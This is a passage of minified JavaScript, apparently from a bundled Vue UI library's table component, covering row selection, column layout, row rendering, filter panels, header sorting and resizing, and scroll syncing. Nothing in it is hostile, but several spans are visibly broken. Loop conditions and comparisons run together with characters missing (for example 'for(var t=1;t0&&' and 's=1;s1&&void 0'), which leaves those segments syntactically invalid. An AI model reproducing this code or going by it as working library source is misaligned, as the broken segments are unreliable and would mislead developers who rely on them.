e=this.states,t=this.table,i=e.rowKey,n=e._currentRowKey,s=e.data||[],r=e.currentRow;if(-1===s.indexOf(r)&&r){if(i){var a=Xn(r,i);this.setCurrentRowByKey(a)}else e.currentRow=null;null===e.currentRow&&t.$emit("current-change",null,r)}else n&&(this.setCurrentRowByKey(n),this.restoreCurrentRowKey())}}},ls=Object.assign||function(e){for(var t=1;t0&&t[0]&&"selection"===t[0].type&&!t[0].fixed&&(t[0].fixed=!0,e.fixedColumns.unshift(t[0]));var i=t.filter((function(e){return!e.fixed}));e.originColumns=[].concat(e.fixedColumns).concat(i).concat(e.rightFixedColumns);var n=hs(i),s=hs(e.fixedColumns),r=hs(e.rightFixedColumns);e.leafColumnsLength=n.length,e.fixedLeafColumnsLength=s.length,e.rightFixedLeafColumnsLength=r.length,e.columns=[].concat(s).concat(n).concat(r),e.isComplex=e.fixedColumns.length>0||e.rightFixedColumns.length>0},scheduleLayout:function(e){e&&this.updateColumns(),this.table.debouncedUpdateLayout()},isSelected:function(e){var t=this.states.selection,i=void 0===t?[]:t;return i.indexOf(e)>-1},clearSelection:function(){var e=this.states;e.isAllSelected=!1;var t=e.selection;t.length&&(e.selection=[],this.table.$emit("selection-change",[]))},cleanSelection:function(){var e=this.states,t=e.data,i=e.rowKey,n=e.selection,s=void 0;if(i){s=[];var r=Zn(n,i),a=Zn(t,i);for(var o in r)r.hasOwnProperty(o)&&!a[o]&&s.push(r[o].row)}else s=n.filter((function(e){return-1===t.indexOf(e)}));if(s.length){var l=n.filter((function(e){return-1===s.indexOf(e)}));e.selection=l,this.table.$emit("selection-change",l.slice())}},toggleRowSelection:function(e,t){var i=!(arguments.length>2&&void 0!==arguments[2])||arguments[2],n=ss(this.states.selection,e,t);if(n){var s=(this.states.selection||[]).slice();i&&this.table.$emit("select",s,e),this.table.$emit("selection-change",s)}},_toggleAllSelection:function(){var e=this.states,t=e.data,i=void 0===t?[]:t,n=e.selection,s=e.selectOnIndeterminate?!e.isAllSelected:!(e.isAllSelected||n.length);e.isAllSelected=s;var r=!1;i.forEach((function(t,i){e.selectable?e.selectable.call(null,t,i)&&ss(n,t,s)&&(r=!0):ss(n,t,s)&&(r=!0)})),r&&this.table.$emit("selection-change",n?n.slice():[]),this.table.$emit("select-all",n)},updateSelectionByRowKey:function(){var e=this.states,t=e.selection,i=e.rowKey,n=e.data,s=Zn(t,i);n.forEach((function(e){var n=Xn(e,i),r=s[n];r&&(t[r.index]=e)}))},updateAllSelected:function(){var e=this.states,t=e.selection,i=e.rowKey,n=e.selectable,s=e.data||[];if(0!==s.length){var r=void 0;i&&(r=Zn(t,i));for(var a=function(e){return r?!!r[Xn(e,i)]:-1!==t.indexOf(e)},o=!0,l=0,c=0,u=s.length;c1?i-1:0),s=1;s1&&void 0!==arguments[1]?arguments[1]:{};if(!e)throw new Error("Table is required.");var i=new ps;return i.table=e,i.toggleAllSelection=L()(10,i._toggleAllSelection),Object.keys(t).forEach((function(e){i.states[e]=t[e]})),i}function ms(e){var t={};return Object.keys(e).forEach((function(i){var n=e[i],s=void 0;"string"===typeof n?s=function(){return this.store.states[n]}:"function"===typeof n?s=function(){return n.call(this,this.store.states)}:console.error("invalid value type"),s&&(t[i]=s)})),t}var vs=i(30),gs=i.n(vs);function bs(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}var ys=function(){function e(t){for(var i in bs(this,e),this.observers=[],this.table=null,this.store=null,this.columns=null,this.fit=!0,this.showHeader=!0,this.height=null,this.scrollX=!1,this.scrollY=!1,this.bodyWidth=null,this.fixedWidth=null,this.rightFixedWidth=null,this.tableHeight=null,this.headerHeight=44,this.appendHeight=0,this.footerHeight=44,this.viewportHeight=null,this.bodyHeight=null,this.fixedBodyHeight=null,this.gutterWidth=gs()(),t)t.hasOwnProperty(i)&&(this[i]=t[i]);if(!this.table)throw new Error("table is required for Table Layout");if(!this.store)throw new Error("store is required for Table Layout")}return e.prototype.updateScrollY=function(){var e=this.height;if(null===e)return!1;var t=this.table.bodyWrapper;if(this.table.$el&&t){var i=t.querySelector(".el-table__body"),n=this.scrollY,s=i.offsetHeight>this.bodyHeight;return this.scrollY=s,n!==s}return!1},e.prototype.setHeight=function(e){var t=this,i=arguments.length>1&&void 0!==arguments[1]?arguments[1]:"height";if(!Rn.a.prototype.$isServer){var n=this.table.$el;if(e=is(e),this.height=e,!n&&(e||0===e))return Rn.a.nextTick((function(){return t.setHeight(e,i)}));"number"===typeof e?(n.style[i]=e+"px",this.updateElsHeight()):"string"===typeof e&&(n.style[i]=e,this.updateElsHeight())}},e.prototype.setMaxHeight=function(e){this.setHeight(e,"max-height")},e.prototype.getFlattenColumns=function(){var e=[],t=this.table.columns;return t.forEach((function(t){t.isColumnGroup?e.push.apply(e,t.columns):e.push(t)})),e},e.prototype.updateElsHeight=function(){var e=this;if(!this.table.$ready)return Rn.a.nextTick((function(){return e.updateElsHeight()}));var t=this.table.$refs,i=t.headerWrapper,n=t.appendWrapper,s=t.footerWrapper;if(this.appendHeight=n?n.offsetHeight:0,!this.showHeader||i){var r=i?i.querySelector(".el-table__header tr"):null,a=this.headerDisplayNone(r),o=this.headerHeight=this.showHeader?i.offsetHeight:0;if(this.showHeader&&!a&&i.offsetWidth>0&&(this.table.columns||[]).length>0&&o<2)return Rn.a.nextTick((function(){return e.updateElsHeight()}));var l=this.tableHeight=this.table.$el.clientHeight,c=this.footerHeight=s?s.offsetHeight:0;null!==this.height&&(this.bodyHeight=l-o-c+(s?1:0)),this.fixedBodyHeight=this.scrollX?this.bodyHeight-this.gutterWidth:this.bodyHeight;var u=!(this.store.states.data&&this.store.states.data.length);this.viewportHeight=this.scrollX?l-(u?0:this.gutterWidth):l,this.updateScrollY(),this.notifyObservers("scrollable")}},e.prototype.headerDisplayNone=function(e){if(!e)return!0;var t=e;while("DIV"!==t.tagName){if("none"===getComputedStyle(t).display)return!0;t=t.parentElement}return!1},e.prototype.updateColumnsWidth=function(){if(!Rn.a.prototype.$isServer){var e=this.fit,t=this.table.$el.clientWidth,i=0,n=this.getFlattenColumns(),s=n.filter((function(e){return"number"!==typeof e.width}));if(n.forEach((function(e){"number"===typeof e.width&&e.realWidth&&(e.realWidth=null)})),s.length>0&&e){n.forEach((function(e){i+=e.width||e.minWidth||80}));var r=this.scrollY?this.gutterWidth:0;if(i<=t-r){this.scrollX=!1;var a=t-r-i;if(1===s.length)s[0].realWidth=(s[0].minWidth||80)+a;else{var o=s.reduce((function(e,t){return e+(t.minWidth||80)}),0),l=a/o,c=0;s.forEach((function(e,t){if(0!==t){var i=Math.floor((e.minWidth||80)*l);c+=i,e.realWidth=(e.minWidth||80)+i}})),s[0].realWidth=(s[0].minWidth||80)+a-c}}else this.scrollX=!0,s.forEach((function(e){e.realWidth=e.minWidth}));this.bodyWidth=Math.max(i,t),this.table.resizeState.width=this.bodyWidth}else n.forEach((function(e){e.width||e.minWidth?e.realWidth=e.width||e.minWidth:e.realWidth=80,i+=e.realWidth})),this.scrollX=i>t,this.bodyWidth=i;var u=this.store.states.fixedColumns;if(u.length>0){var h=0;u.forEach((function(e){h+=e.realWidth||e.width})),this.fixedWidth=h}var d=this.store.states.rightFixedColumns;if(d.length>0){var p=0;d.forEach((function(e){p+=e.realWidth||e.width})),this.rightFixedWidth=p}this.notifyObservers("columns")}},e.prototype.addObserver=function(e){this.observers.push(e)},e.prototype.removeObserver=function(e){var t=this.observers.indexOf(e);-1!==t&&this.observers.splice(t,1)},e.prototype.notifyObservers=function(e){var t=this,i=this.observers;i.forEach((function(i){switch(e){case"columns":i.onColumnsChange(t);break;case"scrollable":i.onScrollableChange(t);break;default:throw new Error("Table Layout don't have event "+e+".")}}))},e}(),_s=ys,xs={created:function(){this.tableLayout.addObserver(this)},destroyed:function(){this.tableLayout.removeObserver(this)},computed:{tableLayout:function(){var e=this.layout;if(!e&&this.table&&(e=this.table.layout),!e)throw new Error("Can not find table layout.");return e}},mounted:function(){this.onColumnsChange(this.tableLayout),this.onScrollableChange(this.tableLayout)},updated:function(){this.__updated__||(this.onColumnsChange(this.tableLayout),this.onScrollableChange(this.tableLayout),this.__updated__=!0)},methods:{onColumnsChange:function(e){var t=this.$el.querySelectorAll("colgroup > col");if(t.length){var i=e.getFlattenColumns(),n={};i.forEach((function(e){n[e.id]=e}));for(var s=0,r=t.length;s col[name=gutter]"),i=0,n=t.length;i=this.leftFixedLeafCount:"right"===this.fixed?e=this.columnsCount-this.rightFixedLeafCount},getSpan:function(e,t,i,n){var s=1,r=1,a=this.table.spanMethod;if("function"===typeof a){var o=a({row:e,column:t,rowIndex:i,columnIndex:n});Array.isArray(o)?(s=o[0],r=o[1]):"object"===("undefined"===typeof o?"undefined":ks(o))&&(s=o.rowspan,r=o.colspan)}return{rowspan:s,colspan:r}},getRowStyle:function(e,t){var i=this.table.rowStyle;return"function"===typeof i?i.call(null,{row:e,rowIndex:t}):i||null},getRowClass:function(e,t){var i=["el-table__row"];this.table.highlightCurrentRow&&e===this.store.states.currentRow&&i.push("current-row"),this.stripe&&t%2===1&&i.push("el-table__row--striped");var n=this.table.rowClassName;return"string"===typeof n?i.push(n):"function"===typeof n&&i.push(n.call(null,{row:e,rowIndex:t})),this.store.states.expandRows.indexOf(e)>-1&&i.push("expanded"),i},getCellStyle:function(e,t,i,n){var s=this.table.cellStyle;return"function"===typeof s?s.call(null,{rowIndex:e,columnIndex:t,row:i,column:n}):s},getCellClass:function(e,t,i,n){var s=[n.id,n.align,n.className];this.isColumnHidden(t)&&s.push("is-hidden");var r=this.table.cellClassName;return"string"===typeof r?s.push(r):"function"===typeof r&&s.push(r.call(null,{rowIndex:e,columnIndex:t,row:i,column:n})),s.push("el-table__cell"),s.join(" ")},getColspanRealWidth:function(e,t,i){if(t<1)return e[i].realWidth;var n=e.map((function(e){var t=e.realWidth;return t})).slice(i,i+t);return n.reduce((function(e,t){return e+t}),-1)},handleCellMouseEnter:function(e,t){var i=this.table,n=Wn(e);if(n){var s=Gn(i,n),r=i.hoverState={cell:n,column:s,row:t};i.$emit("cell-mouse-enter",r.row,r.column,r.cell,e)}var a=e.target.querySelector(".cell");if(Object(Ae["hasClass"])(a,"el-tooltip")&&a.childNodes.length){var o=document.createRange();o.setStart(a,0),o.setEnd(a,a.childNodes.length);var l=o.getBoundingClientRect().width,c=(parseInt(Object(Ae["getStyle"])(a,"paddingLeft"),10)||0)+(parseInt(Object(Ae["getStyle"])(a,"paddingRight"),10)||0);if((l+c>a.offsetWidth||a.scrollWidth>a.offsetWidth)&&this.$refs.tooltip){var u=this.$refs.tooltip;this.tooltipContent=n.innerText||n.textContent,u.referenceElm=n,u.$refs.popper&&(u.$refs.popper.style.display="none"),u.doDestroy(),u.setExpectedState(!0),this.activateTooltip(u)}}},handleCellMouseLeave:function(e){var t=this.$refs.tooltip;t&&(t.setExpectedState(!1),t.handleClosePopper());var i=Wn(e);if(i){var n=this.table.hoverState||{};this.table.$emit("cell-mouse-leave",n.row,n.column,n.cell,e)}},handleMouseEnter:L()(30,(function(e){this.store.commit("setHoverRow",e)})),handleMouseLeave:L()(30,(function(){this.store.commit("setHoverRow",null)})),handleContextMenu:function(e,t){this.handleEvent(e,t,"contextmenu")},handleDoubleClick:function(e,t){this.handleEvent(e,t,"dblclick")},handleClick:function(e,t){this.store.commit("setCurrentRow",t),this.handleEvent(e,t,"click")},handleEvent:function(e,t,i){var n=this.table,s=Wn(e),r=void 0;s&&(r=Gn(n,s),r&&n.$emit("cell-"+i,t,r,s,e)),n.$emit("row-"+i,t,r,e)},rowRender:function(e,t,i){var n=this,s=this.$createElement,r=this.treeIndent,a=this.columns,o=this.firstDefaultColumnIndex,l=this.getRowClass(e,t),c=!0;i&&(l.push("el-table__row--level-"+i.level),c=i.display);var u=c?null:{display:"none"};return s(ws,{style:[u,this.getRowStyle(e,t)],class:l,key:this.getKeyOfRow(e,t),nativeOn:{dblclick:function(t){return n.handleDoubleClick(t,e)},click:function(t){return n.handleClick(t,e)},contextmenu:function(t){return n.handleContextMenu(t,e)},mouseenter:function(e){return n.handleMouseEnter(t)},mouseleave:this.handleMouseLeave},attrs:{columns:a,row:e,index:t,store:this.store,context:this.context||this.table.$vnode.context,firstDefaultColumnIndex:o,treeRowData:i,treeIndent:r,columnsHidden:this.columnsHidden,getSpan:this.getSpan,getColspanRealWidth:this.getColspanRealWidth,getCellStyle:this.getCellStyle,getCellClass:this.getCellClass,handleCellMouseEnter:this.handleCellMouseEnter,handleCellMouseLeave:this.handleCellMouseLeave,isSelected:this.store.isSelected(e),isExpanded:this.store.states.expandRows.indexOf(e)>-1,fixed:this.fixed}})},wrappedRowRender:function(e,t){var i=this,n=this.$createElement,s=this.store,r=s.isRowExpanded,a=s.assertRowKey,o=s.states,l=o.treeData,c=o.lazyTreeNodeMap,u=o.childrenColumnName,h=o.rowKey;if(this.hasExpandColumn&&r(e)){var d=this.table.renderExpanded,p=this.rowRender(e,t);return d?[[p,n("tr",{key:"expanded-row__"+p.key},[n("td",{attrs:{colspan:this.columnsCount},class:"el-table__cell el-table__expanded-cell"},[d(this.$createElement,{row:e,$index:t,store:this.store})])])]]:(console.error("[Element Error]renderExpanded is required."),p)}if(Object.keys(l).length){a();var f=Xn(e,h),m=l[f],v=null;m&&(v={expanded:m.expanded,level:m.level,display:!0},"boolean"===typeof m.lazy&&("boolean"===typeof m.loaded&&m.loaded&&(v.noLazyChildren=!(m.children&&m.children.length)),v.loading=m.loading));var g=[this.rowRender(e,t,v)];if(m){var b=0,y=function e(n,s){n&&n.length&&s&&n.forEach((function(n){var r={display:s.display&&s.expanded,level:s.level+1},a=Xn(n,h);if(void 0===a||null===a)throw new Error("for nested data item, row-key is required.");if(m=Ss({},l[a]),m&&(r.expanded=m.expanded,m.level=m.level||r.level,m.display=!(!m.expanded||!r.display),"boolean"===typeof m.lazy&&("boolean"===typeof m.loaded&&m.loaded&&(r.noLazyChildren=!(m.children&&m.children.length)),r.loading=m.loading)),b++,g.push(i.rowRender(n,t+b,r)),m){var o=c[a]||n[u];e(o,m)}}))};m.display=!0;var _=c[f]||e[u];y(_,m)}return g}return this.rowRender(e,t)}}},$s=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("transition",{attrs:{name:"el-zoom-in-top"}},[e.multiple?i("div",{directives:[{name:"clickoutside",rawName:"v-clickoutside",value:e.handleOutsideClick,expression:"handleOutsideClick"},{name:"show",rawName:"v-show",value:e.showPopper,expression:"showPopper"}],staticClass:"el-table-filter"},[i("div",{staticClass:"el-table-filter__content"},[i("el-scrollbar",{attrs:{"wrap-class":"el-table-filter__wrap"}},[i("el-checkbox-group",{staticClass:"el-table-filter__checkbox-group",model:{value:e.filteredValue,callback:function(t){e.filteredValue=t},expression:"filteredValue"}},e._l(e.filters,(function(t){return i("el-checkbox",{key:t.value,attrs:{label:t.value}},[e._v(e._s(t.text))])})),1)],1)],1),i("div",{staticClass:"el-table-filter__bottom"},[i("button",{class:{"is-disabled":0===e.filteredValue.length},attrs:{disabled:0===e.filteredValue.length},on:{click:e.handleConfirm}},[e._v(e._s(e.t("el.table.confirmFilter")))]),i("button",{on:{click:e.handleReset}},[e._v(e._s(e.t("el.table.resetFilter")))])])]):i("div",{directives:[{name:"clickoutside",rawName:"v-clickoutside",value:e.handleOutsideClick,expression:"handleOutsideClick"},{name:"show",rawName:"v-show",value:e.showPopper,expression:"showPopper"}],staticClass:"el-table-filter"},[i("ul",{staticClass:"el-table-filter__list"},[i("li",{staticClass:"el-table-filter__list-item",class:{"is-active":void 0===e.filterValue||null===e.filterValue},on:{click:function(t){e.handleSelect(null)}}},[e._v(e._s(e.t("el.table.clearFilter")))]),e._l(e.filters,(function(t){return i("li",{key:t.value,staticClass:"el-table-filter__list-item",class:{"is-active":e.isActive(t)},attrs:{label:t.value},on:{click:function(i){e.handleSelect(t.value)}}},[e._v(e._s(t.text))])}))],2)])])},Os=[];$s._withStripped=!0;var Es=[];!Rn.a.prototype.$isServer&&document.addEventListener("click",(function(e){Es.forEach((function(t){var i=e.target;t&&t.$el&&(i===t.$el||t.$el.contains(i)||t.handleOutsideClick&&t.handleOutsideClick(e))}))}));var Ts={open:function(e){e&&Es.push(e)},close:function(e){var t=Es.indexOf(e);-1!==t&&Es.splice(e,1)}},Ps=i(31),Ms=i.n(Ps),Ns={name:"ElTableFilterPanel",mixins:[H.a,g.a],directives:{Clickoutside:V.a},components:{ElCheckbox:In.a,ElCheckboxGroup:Ms.a,ElScrollbar:q.a},props:{placement:{type:String,default:"bottom-end"}},methods:{isActive:function(e){return e.value===this.filterValue},handleOutsideClick:function(){var e=this;setTimeout((function(){e.showPopper=!1}),16)},handleConfirm:function(){this.confirmFilter(this.filteredValue),this.handleOutsideClick()},handleReset:function(){this.filteredValue=[],this.confirmFilter(this.filteredValue),this.handleOutsideClick()},handleSelect:function(e){this.filterValue=e,"undefined"!==typeof e&&null!==e?this.confirmFilter(this.filteredValue):this.confirmFilter([]),this.handleOutsideClick()},confirmFilter:function(e){this.table.store.commit("filterChange",{column:this.column,values:e}),this.table.store.updateAllSelected()}},data:function(){return{table:null,cell:null,column:null}},computed:{filters:function(){return this.column&&this.column.filters},filterValue:{get:function(){return(this.column.filteredValue||[])[0]},set:function(e){this.filteredValue&&("undefined"!==typeof e&&null!==e?this.filteredValue.splice(0,1,e):this.filteredValue.splice(0,1))}},filteredValue:{get:function(){return this.column&&this.column.filteredValue||[]},set:function(e){this.column&&(this.column.filteredValue=e)}},multiple:function(){return!this.column||this.column.filterMultiple}},mounted:function(){var e=this;this.popperElm=this.$el,this.referenceElm=this.cell,this.table.bodyWrapper.addEventListener("scroll",(function(){e.updatePopper()})),this.$watch("showPopper",(function(t){e.column&&(e.column.filterOpened=t),t?Ts.open(e):Ts.close(e)}))},watch:{showPopper:function(e){!0===e&&parseInt(this.popperJS._popper.style.zIndex,10)1;return s&&(this.$parent.isGroup=!0),e("table",{class:"el-table__header",attrs:{cellspacing:"0",cellpadding:"0",border:"0"}},[e("colgroup",[this.columns.map((function(t){return e("col",{attrs:{name:t.id},key:t.id})})),this.hasGutter?e("col",{attrs:{name:"gutter"}}):""]),e("thead",{class:[{"is-group":s,"has-gutter":this.hasGutter}]},[this._l(n,(function(i,n){return e("tr",{style:t.getHeaderRowStyle(n),class:t.getHeaderRowClass(n)},[i.map((function(s,r){return e("th",{attrs:{colspan:s.colSpan,rowspan:s.rowSpan},on:{mousemove:function(e){return t.handleMouseMove(e,s)},mouseout:t.handleMouseOut,mousedown:function(e){return t.handleMouseDown(e,s)},click:function(e){return t.handleHeaderClick(e,s)},contextmenu:function(e){return t.handleHeaderContextMenu(e,s)}},style:t.getHeaderCellStyle(n,r,i,s),class:t.getHeaderCellClass(n,r,i,s),key:s.id},[e("div",{class:["cell",s.filteredValue&&s.filteredValue.length>0?"highlight":"",s.labelClassName]},[s.renderHeader?s.renderHeader.call(t._renderProxy,e,{column:s,$index:r,store:t.store,_self:t.$parent.$vnode.context}):s.label,s.sortable?e("span",{class:"caret-wrapper",on:{click:function(e){return t.handleSortClick(e,s)}}},[e("i",{class:"sort-caret ascending",on:{click:function(e){return t.handleSortClick(e,s,"ascending")}}}),e("i",{class:"sort-caret descending",on:{click:function(e){return t.handleSortClick(e,s,"descending")}}})]):"",s.filterable?e("span",{class:"el-table__column-filter-trigger",on:{click:function(e){return t.handleFilterClick(e,s)}}},[e("i",{class:["el-icon-arrow-down",s.filterOpened?"el-icon-arrow-up":""]})]):""])])})),t.hasGutter?e("th",{class:"el-table__cell gutter"}):""])}))])])},props:{fixed:String,store:{required:!0},border:Boolean,defaultSort:{type:Object,default:function(){return{prop:"",order:""}}}},components:{ElCheckbox:In.a},computed:Ls({table:function(){return this.$parent},hasGutter:function(){return!this.fixed&&this.tableLayout.gutterWidth}},ms({columns:"columns",isAllSelected:"isAllSelected",leftFixedLeafCount:"fixedLeafColumnsLength",rightFixedLeafCount:"rightFixedLeafColumnsLength",columnsCount:function(e){return e.columns.length},leftFixedCount:function(e){return e.fixedColumns.length},rightFixedCount:function(e){return e.rightFixedColumns.length}})),created:function(){this.filterPanels={}},mounted:function(){var e=this;this.$nextTick((function(){var t=e.defaultSort,i=t.prop,n=t.order,s=!0;e.store.commit("sort",{prop:i,order:n,init:s})}))},beforeDestroy:function(){var e=this.filterPanels;for(var t in e)e.hasOwnProperty(t)&&e[t]&&e[t].$destroy(!0)},methods:{isCellHidden:function(e,t){for(var i=0,n=0;n=this.leftFixedLeafCount:"right"===this.fixed?i=this.columnsCount-this.rightFixedLeafCount},getHeaderRowStyle:function(e){var t=this.table.headerRowStyle;return"function"===typeof t?t.call(null,{rowIndex:e}):t},getHeaderRowClass:function(e){var t=[],i=this.table.headerRowClassName;return"string"===typeof i?t.push(i):"function"===typeof i&&t.push(i.call(null,{rowIndex:e})),t.join(" ")},getHeaderCellStyle:function(e,t,i,n){var s=this.table.headerCellStyle;return"function"===typeof s?s.call(null,{rowIndex:e,columnIndex:t,row:i,column:n}):s},getHeaderCellClass:function(e,t,i,n){var s=[n.id,n.order,n.headerAlign,n.className,n.labelClassName];0===e&&this.isCellHidden(t,i)&&s.push("is-hidden"),n.children||s.push("is-leaf"),n.sortable&&s.push("is-sortable");var r=this.table.headerCellClassName;return"string"===typeof r?s.push(r):"function"===typeof r&&s.push(r.call(null,{rowIndex:e,columnIndex:t,row:i,column:n})),s.push("el-table__cell"),s.join(" ")},toggleAllSelection:function(){this.store.commit("toggleAllSelection")},handleFilterClick:function(e,t){e.stopPropagation();var i=e.target,n="TH"===i.tagName?i:i.parentNode;if(!Object(Ae["hasClass"])(n,"noclick")){n=n.querySelector(".el-table__column-filter-trigger")||n;var s=this.$parent,r=this.filterPanels[t.id];r&&t.filterOpened?r.showPopper=!1:(r||(r=new Rn.a(Fs),this.filterPanels[t.id]=r,t.filterPlacement&&(r.placement=t.filterPlacement),r.table=s,r.cell=n,r.column=t,!this.$isServer&&r.$mount(document.createElement("div"))),setTimeout((function(){r.showPopper=!0}),16))}},handleHeaderClick:function(e,t){!t.filters&&t.sortable?this.handleSortClick(e,t):t.filterable&&!t.sortable&&this.handleFilterClick(e,t),this.$parent.$emit("header-click",t,e)},handleHeaderContextMenu:function(e,t){this.$parent.$emit("header-contextmenu",t,e)},handleMouseDown:function(e,t){var i=this;if(!this.$isServer&&!(t.children&&t.children.length>0)&&this.draggingColumn&&this.border){this.dragging=!0,this.$parent.resizeProxyVisible=!0;var n=this.$parent,s=n.$el,r=s.getBoundingClientRect().left,a=this.$el.querySelector("th."+t.id),o=a.getBoundingClientRect(),l=o.left-r+30;Object(Ae["addClass"])(a,"noclick"),this.dragState={startMouseLeft:e.clientX,startLeft:o.right-r,startColumnLeft:o.left-r,tableLeft:r};var c=n.$refs.resizeProxy;c.style.left=this.dragState.startLeft+"px",document.onselectstart=function(){return!1},document.ondragstart=function(){return!1};var u=function(e){var t=e.clientX-i.dragState.startMouseLeft,n=i.dragState.startLeft+t;c.style.left=Math.max(l,n)+"px"},h=function s(){if(i.dragging){var r=i.dragState,o=r.startColumnLeft,l=r.startLeft,h=parseInt(c.style.left,10),d=h-o;t.width=t.realWidth=d,n.$emit("header-dragend",t.width,l-o,t,e),i.store.scheduleLayout(),document.body.style.cursor="",i.dragging=!1,i.draggingColumn=null,i.dragState={},n.resizeProxyVisible=!1}document.removeEventListener("mousemove",u),document.removeEventListener("mouseup",s),document.onselectstart=null,document.ondragstart=null,setTimeout((function(){Object(Ae["removeClass"])(a,"noclick")}),0)};document.addEventListener("mousemove",u),document.addEventListener("mouseup",h)}},handleMouseMove:function(e,t){if(!(t.children&&t.children.length>0)){var i=e.target;while(i&&"TH"!==i.tagName)i=i.parentNode;if(t&&t.resizable&&!this.dragging&&this.border){var n=i.getBoundingClientRect(),s=document.body.style;n.width>12&&n.right-e.pageX<8?(s.cursor="col-resize",Object(Ae["hasClass"])(i,"is-sortable")&&(i.style.cursor="col-resize"),this.draggingColumn=t):this.dragging||(s.cursor="",Object(Ae["hasClass"])(i,"is-sortable")&&(i.style.cursor="pointer"),this.draggingColumn=null)}}},handleMouseOut:function(){this.$isServer||(document.body.style.cursor="")},toggleOrder:function(e){var t=e.order,i=e.sortOrders;if(""===t)return i[0];var n=i.indexOf(t||null);return i[n>i.length-2?0:n+1]},handleSortClick:function(e,t,i){e.stopPropagation();var n=t.order===i?null:i||this.toggleOrder(t),s=e.target;while(s&&"TH"!==s.tagName)s=s.parentNode;if(s&&"TH"===s.tagName&&Object(Ae["hasClass"])(s,"noclick"))Object(Ae["removeClass"])(s,"noclick");else if(t.sortable){var r=this.store.states,a=r.sortProp,o=void 0,l=r.sortingColumn;(l!==t||l===t&&null===l.order)&&(l&&(l.order=null),r.sortingColumn=t,a=t.property),o=t.order=n||null,r.sortProp=a,r.sortOrder=o,this.store.commit("changeSortCondition")}}},data:function(){return{draggingColumn:null,dragging:!1,dragState:{}}}},zs=Object.assign||function(e){for(var t=1;t=this.leftFixedLeafCount;if("right"===this.fixed){for(var n=0,s=0;s=this.columnsCount-this.rightFixedCount)},getRowClasses:function(e,t){var i=[e.id,e.align,e.labelClassName];return e.className&&i.push(e.className),this.isCellHidden(t,this.columns,e)&&i.push("is-hidden"),e.children||i.push("is-leaf"),i}}},Hs=Object.assign||function(e){for(var t=1;t0){var n=i.scrollTop;t.pixelY<0&&0!==n&&e.preventDefault(),t.pixelY>0&&i.scrollHeight-i.clientHeight>n&&e.preventDefault(),i.scrollTop+=Math.ceil(t.pixelY/5)}else i.scrollLeft+=Math.ceil(t.pixelX/5)},handleHeaderFooterMousewheel:function(e,t){var i=t.pixelX,n=t.pixelY;Math.abs(i)>=Math.abs(n)&&(this.bodyWrapper.scrollLeft+=t.pixelX/5)},syncPostion:Object(jn["throttle"])(20,(function(){var e=this.bodyWrapper,t=e.scrollLeft,i=e.scrollTop,n=e.offsetWidth,s=e.scrollWidth,r=this.$refs,a=r.headerWrapper,o=r.footerWrapper,l=r.fixedBodyWrapper,c=r.rightFixedBodyWrapper;a&&(a.scrollLeft=t),o&&(o.scrollLeft=t),l&&(l.scrollTop=i),c&&(c.scrollTop=i);var u=s-n-1;this.scrollPosition=t>=u?"right":0===t?"left":"middle"})),bindEvents:function(){this.bodyWrapper.addEventListener("scroll",this.syncPostion,{passive:!0}),this.fit&&Object(Ji["addResizeListener"])(this.$el,this.resizeListener)},unbindEvents:function(){this.bodyWrapper.removeEventListener("scroll",this.syncPostion,{passive:!0}),this.fit&&Object(Ji["removeResizeListener"])(this.$el,this.resizeListener)},resizeListener:function(){if(this.$ready){var e=!1,t=this.$el,i=this.resizeState,n=i.width,s=i.height,r=t.offsetWidth;n!==r&&(e=!0);var a=t.offsetHeight;(this.height||this.shouldUpdateHeight)&&s!==a&&(e=!0),e&&(this.resizeState.width=r,this.resizeState.height=a,this.doLayout())}},doLayout:function(){this.shouldUpdateHeight&&this.layout.updateElsHeight(),this.layout.updateColumnsWidth()},sort:function(e,t){this.store.commit("sort",{prop:e,order:t})},toggleAllSelection:function(){this.store.commit("toggleAllSelection")}},computed:Hs({tableSize:function(){return this.size||(this.$ELEMENT||{}).size},bodyWrapper:function(){return this.$refs.bodyWrapper},shouldUpdateHeight:function(){return this.height||this.maxHeight||this.fixedColumns.length>0||this.rightFixedColumns.length>0},bodyWidth:function(){var e=this.layout,t=e.bodyWidth,i=e.scrollY,n=e.gutterWidth;return t?t-(i?n:0)+"px":""},bodyHeight:function(){var e=this.layout,t=e.headerHeight,i=void 0===t?0:t,n=e.bodyHeight,s=e.footerHeight,r=void 0===s?0:s;if(this.height)return{height:n?n+"px":""};if(this.maxHeight){var a=is(this.maxHeight);if("number"===typeof a)return{"max-height":a-r-(this.showHeader?i:0)+"px"}}return{}},fixedBodyHeight:function(){if(this.height)return{height:this.layout.fixedBodyHeight?this.layout.fixedBodyHeight+"px":""};if(this.maxHeight){var e=is(this.maxHeight);if("number"===typeof e)return e=this.layout.scrollX?e-this.layout.gutterWidth:e,this.showHeader&&(e-=this.layout.headerHeight),e-=this.layout.footerHeight,{"max-height":e+"px"}}return{}},fixedHeight:function(){return this.maxHeight?this.showSummary?{bottom:0}:{bottom:this.layout.scrollX&&this.data.length?this.layout.gutterWidth+"px":""}:this.showSummary?{height:this.layout.tableHeight?this.layout.tableHeight+"px":""}:{height:this.layout.viewportHeight?this.layout.viewportHeight+"px":""}},emptyBlockStyle:function(){if(this.data&&this.data.length)return null;var e="100%";return this.layout.appendHeight&&(e="calc(100% - "+this.layout.appendHeight+"px)"),{width:this.bodyWidth,height:e}}},ms({selection:"selection",columns:"columns",tableData:"data",fixedColumns:"fixedColumns",rightFixedColumns:"rightFixedColumns"})),watch:{height:{immediate:!0,handler:function(e){this.layout.setHeight(e)}},maxHeight:{immediate:!0,handler:function(e){this.layout.setMaxHeight(e)}},currentRowKey:{immediate:!0,handler:function(e){this.rowKey&&this.store.setCurrentRowKey(e)}},data:{immediate:!0,handler:function(e){this.store.commit("setData",e)}},expandRowKeys:{immediate:!0,handler:function(e){e&&this.store.setExpandRowKeysAdapter(e)}}},created:function(){var e=this;this.tableId="el-table_"+Ws++,this.debouncedUpdateLayout=Object(jn["debounce"])(50,(function(){return e.doLayout()}))},mounted:function(){var e=this;this.bindEvents(),this.store.updateColumns(),this.doLayout(),this.resizeState={width:this.$el.offsetWidth,height:this.$el.offsetHeight},this.store.states.columns.forEach((function(t){t.filteredValue&&t.filteredValue.length&&e.store.commit("filterChange",{column:t,values:t.filteredValue,silent:!0})})),this.$ready=!0},destroyed:function(){this.unbindEvents()},data:function(){var e=this.treeProps,t=e.hasChildren,i=void 0===t?"hasChildren":t,n=e.children,s=void 